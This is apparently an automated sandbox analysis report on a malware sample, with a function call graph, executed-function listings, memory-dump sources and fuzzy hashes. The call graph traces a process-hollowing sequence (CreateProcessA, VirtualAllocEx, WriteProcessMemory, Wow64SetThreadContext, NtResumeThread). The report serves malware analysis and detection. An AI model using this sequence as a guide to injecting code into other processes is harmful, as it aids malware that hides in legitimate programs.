6e22a40 57075->57081 57095 6e22a3c 57075->57095 57109 6e22a39 57075->57109 57123 6e22a30 57075->57123 57076 6e2229b 57082 6e22a55 57081->57082 57084 6e22a77 57082->57084 57137 6e231f8 57082->57137 57144 6e23978 57082->57144 57148 6e22d38 57082->57148 57153 6e234ba 57082->57153 57160 6e23022 57082->57160 57165 6e235de 57082->57165 57171 6e237de 57082->57171 57177 6e234d9 57082->57177 57182 6e236d3 57082->57182 57188 6e22f12 57082->57188 57195 6e232c7 57082->57195 57084->57076 57096 6e22a43 57095->57096 57097 6e23022 2 API calls 57096->57097 57098 6e22a77 57096->57098 57099 6e234ba 3 API calls 57096->57099 57100 6e22d38 4 API calls 57096->57100 57101 6e23978 4 API calls 57096->57101 57102 6e231f8 2 API calls 57096->57102 57103 6e232c7 3 API calls 57096->57103 57104 6e22f12 3 API calls 57096->57104 57105 6e236d3 3 API calls 57096->57105 57106 6e234d9 2 API calls 57096->57106 57107 6e237de 3 API calls 57096->57107 57108 6e235de 3 API calls 57096->57108 57097->57098 57098->57076 57099->57098 57100->57098 57101->57098 57102->57098 57103->57098 57104->57098 57105->57098 57106->57098 57107->57098 57108->57098 57110 6e22a3a 57109->57110 57111 6e23022 2 API calls 57110->57111 57112 6e22a77 57110->57112 57113 6e234ba 3 API calls 57110->57113 57114 6e22d38 4 API calls 57110->57114 57115 6e23978 4 API calls 57110->57115 57116 6e231f8 2 API calls 57110->57116 57117 6e232c7 3 API calls 57110->57117 57118 6e22f12 3 API calls 57110->57118 57119 6e236d3 3 API calls 57110->57119 57120 6e234d9 2 API calls 57110->57120 57121 6e237de 3 API calls 57110->57121 57122 6e235de 3 API calls 57110->57122 57111->57112 57112->57076 57113->57112 57114->57112 57115->57112 57116->57112 57117->57112 57118->57112 57119->57112 57120->57112 57121->57112 57122->57112 57124 6e22a3a 57123->57124 57125 6e23022 2 API calls 57124->57125 57126 6e22a77 57124->57126 57127 6e234ba 3 API calls 57124->57127 57128 6e22d38 4 API calls 57124->57128 57129 6e23978 4 API calls 57124->57129 57130 6e231f8 2 API calls 57124->57130 57131 6e232c7 3 API calls 57124->57131 57132 6e22f12 3 API calls 57124->57132 57133 6e236d3 3 API calls 57124->57133 57134 6e234d9 2 API calls 57124->57134 57135 6e237de 3 API calls 57124->57135 57136 6e235de 3 API calls 57124->57136 57125->57126 57126->57076 57127->57126 57128->57126 57129->57126 57130->57126 57131->57126 57132->57126 57133->57126 57134->57126 57135->57126 57136->57126 57138 6e23210 57137->57138 57202 6e24160 57138->57202 57206 6e2415c 57138->57206 57210 6e24158 57138->57210 57214 6e24151 57138->57214 57139 6e23228 57231 6e26255 57144->57231 57238 6e26258 57144->57238 57145 6e22b08 57145->57084 57261 6e25f48 57148->57261 57268 6e25f50 57148->57268 57275 6e25f40 57148->57275 57149 6e22b08 57149->57084 57154 6e23c37 57153->57154 57282 6e26031 57154->57282 57288 6e26029 57154->57288 57294 6e26038 57154->57294 57300 6e26034 57154->57300 57155 6e23c81 57161 6e2302c 57160->57161 57320 6da67c8 57161->57320 57324 6da67d0 57161->57324 57162 6e22b08 57162->57084 57166 6e23600 57165->57166 57328 6da6618 57166->57328 57332 6da65d1 57166->57332 57337 6da6620 57166->57337 57167 6e23630 57172 6e23800 57171->57172 57174 6da6618 WriteProcessMemory 57172->57174 57175 6da6620 WriteProcessMemory 57172->57175 57176 6da65d1 WriteProcessMemory 57172->57176 57173 6e22dcc 57173->57084 57174->57173 57175->57173 57176->57173 57178 6e23048 57177->57178 57179 6e22b08 57178->57179 57180 6da67c8 NtResumeThread 57178->57180 57181 6da67d0 NtResumeThread 57178->57181 57179->57084 57180->57179 57181->57179 57183 6e236f5 57182->57183 57185 6da6618 WriteProcessMemory 57183->57185 57186 6da6620 WriteProcessMemory 57183->57186 57187 6da65d1 WriteProcessMemory 57183->57187 57184 6e22b08 57184->57084 57185->57184 57186->57184 57187->57184 57189 6e22f1c 57188->57189 57191 6e26031 3 API calls 57189->57191 57192 6e26034 3 API calls 57189->57192 57193 6e26038 3 API calls 57189->57193 57194 6e26029 3 API calls 57189->57194 57190 6e23c81 57191->57190 57192->57190 57193->57190 57194->57190 57196 6e232d1 57195->57196 57198 6e26031 3 API calls 57196->57198 57199 6e26034 3 API calls 57196->57199 57200 6e26038 3 API calls 57196->57200 57201 6e26029 3 API calls 57196->57201 57197 6e23c81 57198->57197 57199->57197 57200->57197 57201->57197 57203 6e24177 57202->57203 57204 6e24199 57203->57204 57218 6e2447e 57203->57218 57204->57139 57207 6e24163 57206->57207 57208 6e24199 57207->57208 57209 6e2447e 2 API calls 57207->57209 57208->57139 57209->57208 57211 6e2415a 57210->57211 57212 6e24199 57211->57212 57213 6e2447e 2 API calls 57211->57213 57212->57139 57213->57212 57215 6e2415a 57214->57215 57216 6e24199 57215->57216 57217 6e2447e 2 API calls 57215->57217 57216->57139 57217->57216 57222 6da5e00 57218->57222 57226 6da5df4 57218->57226 57223 6da5e64 CreateProcessA 57222->57223 57225 6da5fec 57223->57225 57227 6da5dd7 57226->57227 57228 6da5dfe CreateProcessA 57226->57228 57230 6da5fec 57228->57230 57232 6e2625b 57231->57232 57245 6da60f8 57232->57245 57249 6da5a81 57232->57249 57253 6da6100 57232->57253 57257 6da5a39 57232->57257 57233 6e26286 57233->57145 57239 6e2626d 57238->57239 57241 6da60f8 Wow64SetThreadContext 57239->57241 57242 6da5a39 Wow64SetThreadContext 57239->57242 57243 6da6100 Wow64SetThreadContext 57239->57243 57244 6da5a81 Wow64SetThreadContext 57239->57244 57240 6e26286 57240->57145 57241->57240 57242->57240 57243->57240 57244->57240 57246 6da6145 Wow64SetThreadContext 57245->57246 57248 6da618d 57246->57248 57248->57233 57249->57233 57250 6da615a Wow64SetThreadContext 57249->57250 57252 6da618d 57250->57252 57252->57233 57254 6da6145 Wow64SetThreadContext 57253->57254 57256 6da618d 57254->57256 57256->57233 57257->57233 57258 6da6112 Wow64SetThreadContext 57257->57258 57260 6da618d 57258->57260 57260->57233 57262 6e25f53 57261->57262 57264 6da60f8 Wow64SetThreadContext 57262->57264 57265 6da5a39 Wow64SetThreadContext 57262->57265 57266 6da6100 Wow64SetThreadContext 57262->57266 57267 6da5a81 Wow64SetThreadContext 57262->57267 57263 6e25f7e 57263->57149 57264->57263 57265->57263 57266->57263 57267->57263 57269 6e25f65 57268->57269 57271 6da60f8 Wow64SetThreadContext 57269->57271 57272 6da5a39 Wow64SetThreadContext 57269->57272 57273 6da6100 Wow64SetThreadContext 57269->57273 57274 6da5a81 Wow64SetThreadContext 57269->57274 57270 6e25f7e 57270->57149 57271->57270 57272->57270 57273->57270 57274->57270 57276 6e25f4a 57275->57276 57278 6da60f8 Wow64SetThreadContext 57276->57278 57279 6da5a39 Wow64SetThreadContext 57276->57279 57280 6da6100 Wow64SetThreadContext 57276->57280 57281 6da5a81 Wow64SetThreadContext 57276->57281 57277 6e25f7e 57277->57149 57278->57277 57279->57277 57280->57277 57281->57277 57283 6e2603a 57282->57283 57306 6da6518 57283->57306 57310 6da6520 57283->57310 57314 6da63d8 57283->57314 57284 6e2606f 57284->57155 57289 6e26032 57288->57289 57291 6da6518 VirtualAllocEx 57289->57291 57292 6da63d8 VirtualAllocEx 57289->57292 57293 6da6520 VirtualAllocEx 57289->57293 57290 6e2606f 57290->57155 57291->57290 57292->57290 57293->57290 57295 6e2604d 57294->57295 57297 6da6518 VirtualAllocEx 57295->57297 57298 6da63d8 VirtualAllocEx 57295->57298 57299 6da6520 VirtualAllocEx 57295->57299 57296 6e2606f 57296->57155 57297->57296 57298->57296 57299->57296 57301 6e2603b 57300->57301 57303 6da6518 VirtualAllocEx 57301->57303 57304 6da63d8 VirtualAllocEx 57301->57304 57305 6da6520 VirtualAllocEx 57301->57305 57302 6e2606f 57302->57155 57303->57302 57304->57302 57305->57302 57307 6da6560 VirtualAllocEx 57306->57307 57309 6da659d 57307->57309 57309->57284 57311 6da6560 VirtualAllocEx 57310->57311 57313 6da659d 57311->57313 57313->57284 57315 6da63f7 57314->57315 57318 6da646f 57314->57318 57315->57284 57316 6da6472 57316->57284 57317 6da657e VirtualAllocEx 57319 6da659d 57317->57319 57318->57316 57318->57317 57319->57284 57321 6da67d0 NtResumeThread 57320->57321 57323 6da684d 57321->57323 57323->57162 57325 6da6818 NtResumeThread 57324->57325 57327 6da684d 57325->57327 57327->57162 57329 6da6620 WriteProcessMemory 57328->57329 57331 6da66bf 57329->57331 57331->57167 57333 6da65ef 57332->57333 57334 6da6665 WriteProcessMemory 57332->57334 57333->57167 57336 6da66bf 57334->57336 57336->57167 57338 6da6668 WriteProcessMemory 57337->57338 57340 6da66bf 57338->57340 57340->57167 56981 6d50a43 56982 6d50a4d 56981->56982 56986 6c6ab88 56982->56986 56990 6c6ab78 56982->56990 56983 6d5008f 56987 6c6ab9d 56986->56987 56994 6c6b063 56987->56994 56991 6c6ab88 56990->56991 56993 6c6b063 2 API calls 56991->56993 56992 6c6abb3 56992->56983 56993->56992 56996 6c6b08a 56994->56996 56995 6c6abb3 56995->56983 56996->56995 56999 6da6a08 56996->56999 57003 6da6a10 56996->57003 57000 6da6a0d VirtualProtect 56999->57000 57002 6da6a93 57000->57002 57002->56996 57004 6da6a58 VirtualProtect 57003->57004 57006 6da6a93 57004->57006 57006->56996

                                                                Executed Functions

                                                                Function 06C65A98 Relevance: 2.1, Strings: 1, Instructions: 808COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: ec7d624f7b09f1251f4aa2fea1911d712a5b270328f8e9d3acb4c5c755ac19a4
                                                                • Instruction ID: 106f9475b64fce7c3b4314fd2b0e04b43dccfd40af997406a46c9df550f64de6
                                                                • Opcode Fuzzy Hash: ec7d624f7b09f1251f4aa2fea1911d712a5b270328f8e9d3acb4c5c755ac19a4
                                                                • Instruction Fuzzy Hash: AB628B70A006158FCB95CFAAC49866EFBF2FF88300F24852DE556D7391DB30A945CB95
                                                                Function 0714EFB0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Dqq
                                                                • API String ID: 0-373195589
                                                                • Opcode ID: 4be2ef8d18d537094352ea14f1afbc1d067816fc5363fd1e83bc933ebf2b7fe3
                                                                • Instruction ID: ff5a22698471303879b547a7f1c4f00f5dbcad6069b9ec1ce149b77103ec30de
                                                                • Opcode Fuzzy Hash: 4be2ef8d18d537094352ea14f1afbc1d067816fc5363fd1e83bc933ebf2b7fe3
                                                                • Instruction Fuzzy Hash: 7ED1E3B4E01219CFDB54DFA9D994A9DBBB2FF88300F1081A9D409AB3A5DB359D81CF50
                                                                Function 06C88F40 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 61f675b223e666cd129047d119300ec5dc7a2f23ffefb5cd297ac2579dcef056
                                                                • Instruction ID: ea846b273321fb84068697716cf7383f1e1c32b24440673b05024f5da9d654f0
                                                                • Opcode Fuzzy Hash: 61f675b223e666cd129047d119300ec5dc7a2f23ffefb5cd297ac2579dcef056
                                                                • Instruction Fuzzy Hash: 1BC1F670E05218CFDBA4DFA9D848BADBBF6FF89304F5081A9D409A7255DB749A85CF00
                                                                Function 06C88F50 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 3af276ed0e5cd99d54bc0fa646ffdfebafba9b8141b014dfa81918196d337203
                                                                • Instruction ID: 477d67166c1937d6984e1c7915d0a917189b162e5b83a9340b2b076a0f0f4a8c
                                                                • Opcode Fuzzy Hash: 3af276ed0e5cd99d54bc0fa646ffdfebafba9b8141b014dfa81918196d337203
                                                                • Instruction Fuzzy Hash: ABB1E670E05218CFEBA4DFAAD848BADBBF6FF89304F5090A9D409A7255D7749985CF00
                                                                Function 06C61EC0 Relevance: 4.1, Strings: 3, Instructions: 362COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1082 6c61ec0-6c61ed0 1083 6c61ed6-6c61eda 1082->1083 1084 6c61fe9-6c6200e 1082->1084 1085 6c62015-6c6203a 1083->1085 1086 6c61ee0-6c61ee9 1083->1086 1084->1085 1087 6c62041-6c62077 1085->1087 1086->1087 1088 6c61eef-6c61f16 1086->1088 1104 6c6207e-6c62090 1087->1104 1098 6c61fde-6c61fe8 1088->1098 1099 6c61f1c-6c61f1e 1088->1099 1102 6c61f20-6c61f23 1099->1102 1103 6c61f3f-6c61f41 1099->1103 1102->1104 1105 6c61f29-6c61f33 1102->1105 1106 6c61f44-6c61f48 1103->1106 1113 6c62092-6c62099 1104->1113 1114 6c6209b-6c620d4 1104->1114 1105->1104 1108 6c61f39-6c61f3d 1105->1108 1109 6c61f4a-6c61f59 1106->1109 1110 6c61fa9-6c61fb5 1106->1110 1108->1103 1108->1106 1109->1104 1117 6c61f5f-6c61fa6 1109->1117 1110->1104 1111 6c61fbb-6c61fd8 1110->1111 1111->1098 1111->1099 1113->1114 1123 6c620d6-6c620ea 1114->1123 1124 6c620f8-6c6210f 1114->1124 1117->1110 1181 6c620ed call 6c62440 1123->1181 1182 6c620ed call 6c62450 1123->1182 1183 6c620ed call 6c625d8 1123->1183 1184 6c620ed call 6c62739 1123->1184 1132 6c62115-6c621fb call 6c60ef8 call 6c60090 1124->1132 1133 6c62200-6c62210 1124->1133 1129 6c620f3 1131 6c62323-6c6232e 1129->1131 1138 6c62330-6c62340 1131->1138 1139 6c6235d-6c6237e 1131->1139 1132->1133 1140 6c62216-6c622f0 1133->1140 1141 6c622fe-6c6231a 1133->1141 1147 6c62342-6c62348 1138->1147 1148 6c62350-6c62356 1138->1148 1178 6c622f2 1140->1178 1179 6c622fb 1140->1179 1141->1131 1147->1148 1148->1139 1178->1179 1179->1141 1181->1129 1182->1129 1183->1129 1184->1129
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$(nq$Hnq
                                                                • API String ID: 0-1151833592
                                                                • Opcode ID: 906ee0c4d341c3f0fdf78a44e2d517b1563847f58a4c9c7eb96d64b989543aea
                                                                • Instruction ID: 574171cf7454150b6663a77bdb84e3c7bcbb264585d695762f221f4bd9627d32
                                                                • Opcode Fuzzy Hash: 906ee0c4d341c3f0fdf78a44e2d517b1563847f58a4c9c7eb96d64b989543aea
                                                                • Instruction Fuzzy Hash: 73E16434A01209DFCB54EFA4D4949AEBBB2FF89310F118569E802AB364DF34ED45CB95
                                                                Function 06E23978 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !$)
                                                                • API String ID: 0-1972669455
                                                                • Opcode ID: c6ecbe2d157c8bc46335f77cceb12c1418624c9023a9f32e85c8a2a1b9a52c77
                                                                • Instruction ID: b3d185acd7a060cda5c02bc4aceb219c92fb290fdf6b95dd8c4a0793442f88b8
                                                                • Opcode Fuzzy Hash: c6ecbe2d157c8bc46335f77cceb12c1418624c9023a9f32e85c8a2a1b9a52c77
                                                                • Instruction Fuzzy Hash: D141DF70905269CFEBA0CF54D848BE9B7B2EB49305F50A4EAC509B7240C7B99BC8CF14
                                                                Function 06E232C7 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$&
                                                                • API String ID: 0-3870246384
                                                                • Opcode ID: 5c18c6f278bc1f2349c0551ffdab1691cf16e516544a5011bae9957ce907f4f0
                                                                • Instruction ID: b58926f0343341961819f79e33cac01f02e48719daa625f37b7644a687feacd9
                                                                • Opcode Fuzzy Hash: 5c18c6f278bc1f2349c0551ffdab1691cf16e516544a5011bae9957ce907f4f0
                                                                • Instruction Fuzzy Hash: 3B01CE74D052288FCBA5CF64D854BDEBBB2FB48300F10549AEA19B7280CB785E808F40
                                                                Function 06C82985 Relevance: 2.5, Strings: 2, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A$T
                                                                • API String ID: 0-334973614
                                                                • Opcode ID: 06e4dabc6327dbf866f0c7505ffceeed1cbcf0054d700a079293e8906ac83379
                                                                • Instruction ID: 95fb91d9f3de11b3edda87ec6209669c7653c3a58e4ca3f48730c1a1c93929fe
                                                                • Opcode Fuzzy Hash: 06e4dabc6327dbf866f0c7505ffceeed1cbcf0054d700a079293e8906ac83379
                                                                • Instruction Fuzzy Hash: 4BF0AA74C00219CFDBA0DFA4C888AACBBB1BF09319F145169C909A3240C7380986CF54
                                                                Function 06C643C8 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: eb77a6bb49ccfaff61bec8871a548584649c8d8d3dc2f025550efb4b1c858657
                                                                • Instruction ID: 9243510875258db108402f60ba337987b976171b5d385b0c560331e6b15ad11a
                                                                • Opcode Fuzzy Hash: eb77a6bb49ccfaff61bec8871a548584649c8d8d3dc2f025550efb4b1c858657
                                                                • Instruction Fuzzy Hash: 65717C34B00614CFCB88EF65C494A6DB7B2FF88300F508569E4169B7A4CB74ED46CBA5
                                                                Function 06E22E53 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 7
                                                                • API String ID: 0-1790921346
                                                                • Opcode ID: 89c542bb4e4afddcce38f76b2cf0ee9495ba1faaffd10d07b84239bcc6086bfb
                                                                • Instruction ID: 9df5e99339f78761d7195c66fe3e76671c7a867432b733daabfc1dd170113d94
                                                                • Opcode Fuzzy Hash: 89c542bb4e4afddcce38f76b2cf0ee9495ba1faaffd10d07b84239bcc6086bfb
                                                                • Instruction Fuzzy Hash: 4451CF74905229CFEBA0CF64C884BE9B7B2EB49314F50A0EAD509B7244C7799BC9CF54
                                                                Function 07133CD2 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: j
                                                                • API String ID: 0-2137352139
                                                                • Opcode ID: 67559f2809373a8abf8fa0ed209a89168bf69964654e6cfcbf9e724cb3731d0b
                                                                • Instruction ID: b28d728083c43960998b3fe4bb8913161ef062bfbd8b7726f3ee2fcade80c552
                                                                • Opcode Fuzzy Hash: 67559f2809373a8abf8fa0ed209a89168bf69964654e6cfcbf9e724cb3731d0b
                                                                • Instruction Fuzzy Hash: AC114674A0422ACFDB66DF54C8886EAB7F1FB49304F5150E9D419A7684DB348E898F40
                                                                Function 06E22F12 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &
                                                                • API String ID: 0-1010288
                                                                • Opcode ID: 5cb15b58760778d405642cb6cfe7698b703533740975eac3633dc5d9d392ad93
                                                                • Instruction ID: fbd6ccfd5623805a8a46a5477e6d5e816c92ea759e57657411f671eaa33e10f2
                                                                • Opcode Fuzzy Hash: 5cb15b58760778d405642cb6cfe7698b703533740975eac3633dc5d9d392ad93
                                                                • Instruction Fuzzy Hash: DA01AF74D06328CFDB60CF64D845BDEBBB1EB08700F108099A619B7240C7B95E81CF40
                                                                Function 06E234BA Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &
                                                                • API String ID: 0-1010288
                                                                • Opcode ID: b38af091d8394e7fb0e03a6959d1be2c651e6583b300fccdf347024288b22ac0
                                                                • Instruction ID: 5b4f7b9657bc01c382503e4cad0a8d16ede2146974eff4eb360c7e804f94f991
                                                                • Opcode Fuzzy Hash: b38af091d8394e7fb0e03a6959d1be2c651e6583b300fccdf347024288b22ac0
                                                                • Instruction Fuzzy Hash: DEF09D74D063289FDB60CF64D845BDDBBB2FB08700F1081A9A659B7240D7B55E818F80
                                                                Function 06E231F8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                • Opcode ID: dc3fa701b0bc7a8e877b59c118b3f8fdfa692daab7a9b6d082a89776d72e01ba
                                                                • Instruction ID: 223c38f646e23b60201f0b46342bcb462005a8fea9188c62cbaf96234faac64b
                                                                • Opcode Fuzzy Hash: dc3fa701b0bc7a8e877b59c118b3f8fdfa692daab7a9b6d082a89776d72e01ba
                                                                • Instruction Fuzzy Hash: B8F0A53590571ADBCF529F94C904ADAB776FF94304F10C645A6493B250DB31AA96CF80
                                                                Function 06C83405 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: a440de5fdbd1cb82942f2ef22e1a5883559cbf757ba105035868962835e69c4d
                                                                • Instruction ID: 7fc2f5e8429b8c7a314c486b010b79837a91c9787125756e881066b1a0d52c8b
                                                                • Opcode Fuzzy Hash: a440de5fdbd1cb82942f2ef22e1a5883559cbf757ba105035868962835e69c4d
                                                                • Instruction Fuzzy Hash: C2D06C749082288EEBA0DB14C8886AABBB1EB54304F1490D98488B3250CB705AC18F44
                                                                Function 06C617C8 Relevance: .4, Instructions: 437COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d57198dbfd9f2a73a234ba26ff167011b148499b0e3b2b8473f71797a6d4920
                                                                • Instruction ID: 39b240519c861407301087200a2c73e28649233b4d2c0b750d3231bef2eb9d1c
                                                                • Opcode Fuzzy Hash: 2d57198dbfd9f2a73a234ba26ff167011b148499b0e3b2b8473f71797a6d4920
                                                                • Instruction Fuzzy Hash: ED122A30A002188FCB54EF69C994A9DB7B2FF89301F5585A8E44AAB755DF30EE85CF50
                                                                Function 06C84610 Relevance: .3, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a2bf027f60d0bc287d100444022dad3abb14914af2d2ff52519383ac74083368
                                                                • Instruction ID: 8937c5c11cdf46ff075cacb1c969d00707cd7f5503b4b415143f330d462730cf
                                                                • Opcode Fuzzy Hash: a2bf027f60d0bc287d100444022dad3abb14914af2d2ff52519383ac74083368
                                                                • Instruction Fuzzy Hash: 2EC15674E0421ACFDBA9EFA9D4446AEBBF6FF49309F10802AD419AB384C7345985CF51
                                                                Function 06C84600 Relevance: .2, Instructions: 201COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33d185d138683759a058a0411dab3e4b187430f5c21ad49e96abb9d20cfc3628
                                                                • Instruction ID: 1ae50191bae2f2baa685405013bf34186245582782d6a17ec0551738118e01c6
                                                                • Opcode Fuzzy Hash: 33d185d138683759a058a0411dab3e4b187430f5c21ad49e96abb9d20cfc3628
                                                                • Instruction Fuzzy Hash: BB916770D0425ACFDBA9EFA9C4447AEBBF5FF49309F14812AD415AB280C7344A85CF91
                                                                Function 06C88229 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5152f9a317a53809ed2adc0e9800bbfc63de243a5d0e3d5e4f86d978f359dbad
                                                                • Instruction ID: 58181680e0639973ebf1642e62de6cc378d484a8a9174a771a1c50878bc54d55
                                                                • Opcode Fuzzy Hash: 5152f9a317a53809ed2adc0e9800bbfc63de243a5d0e3d5e4f86d978f359dbad
                                                                • Instruction Fuzzy Hash: 8561F870D06218CFEBA0DF69C954BADBBF6FB85308F9084A9D009A7A41D7795E84CF40
                                                                Function 06C65668 Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
